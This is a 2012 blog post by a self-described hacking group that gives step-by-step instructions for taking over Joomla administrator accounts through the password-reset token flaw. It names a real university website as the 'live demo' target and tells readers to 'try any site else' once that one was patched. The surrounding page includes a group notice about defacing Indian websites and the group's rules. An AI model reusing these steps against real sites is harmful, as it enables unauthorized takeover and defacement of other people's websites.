3xp1r3 Cyber Army: Joomla Password Reset vulnerability

Friday, February 10, 2012

Joomla Password Reset vulnerability

Section: Joomla Hack

Joomla Password Reset vulnerability : Explain with Live demo :

website : http://miit.unikl.edu.my/

The tricks is like this:

1. Go to http://miit.unikl.edu.my/index.php?option=

com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose

already sent to your email,

2. Now, put a single quote ' into field text box "token" and Click OK.The sql query then will be looks like this :



"SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
3. Write new password for admin
4. Go to url : http://miit.unikl.edu.my/administrator/
5. Login admin with your new password

** update: miit joomla was patched.. Try any site else :P

0 comments:

Post a Comment

NOTICE From Admin Panel

Dear all members,crews and Admin, Please Read Carefully, A very important notice for all:-

We are going to Stop Attack on Indian Website Defacment including all hacking activities. We got warned from diffrent trusted sources. Our main aim/target behind the hack was to raise Public awarness regarding Border side issues. We 3xp1r3 think that there should be limitation for everything, we dont want our government to be harm. After this Notice if any hacking activites done by the name of 3xp1r3 we are not resposable. We request our members/admin/crews to stop hacking activities from now!

Ethical BD HaXor

Read Our Rulez

Welcome to 3xp1r3 Cyber Army, in-order to join our
group you are bound to the following Rules:-
1. No Personal Attack
2. Respect All Members
3. Not to Replace Index, Replace on your own risk! ( We 3xp1r3 not resposible for this)
4. Extremely forbidden of using Slang/Vulgar Language.
5. Don't do if you don't know what you doing.
6. We 3xp1r3 don't encourage anyone to involved in hacking activities.
7. Our goal and motto is to understand better security.
8. No Members/Admin/Mod are allowed to Post/Comment which relates to Politics, Religion,Race etc. ( If anybody found, will be deleted all his post and will be banned permanently).
9. Advertising on our wall i.e Posting Web-Links,Blog,Other Page links is extremely Forbidden!
10. Non techie Post/Post Reply will be deleted.
N.B: Breaking of Any Rules will be banned!

===========Still Confused? Have Question? Contact Us==
Admin@3xp1r3.com

3xp1r3 Cyber Army

Friday, February 10, 2012

Joomla Password Reset vulnerability

0 comments:

Post a Comment

RADIO

NOTICE From Admin Panel

Dear all members,crews and Admin, Please Read Carefully, A very important notice for all:-

Ethical BD HaXor

Read Our Rulez

All TaG

Blog Archive

Labels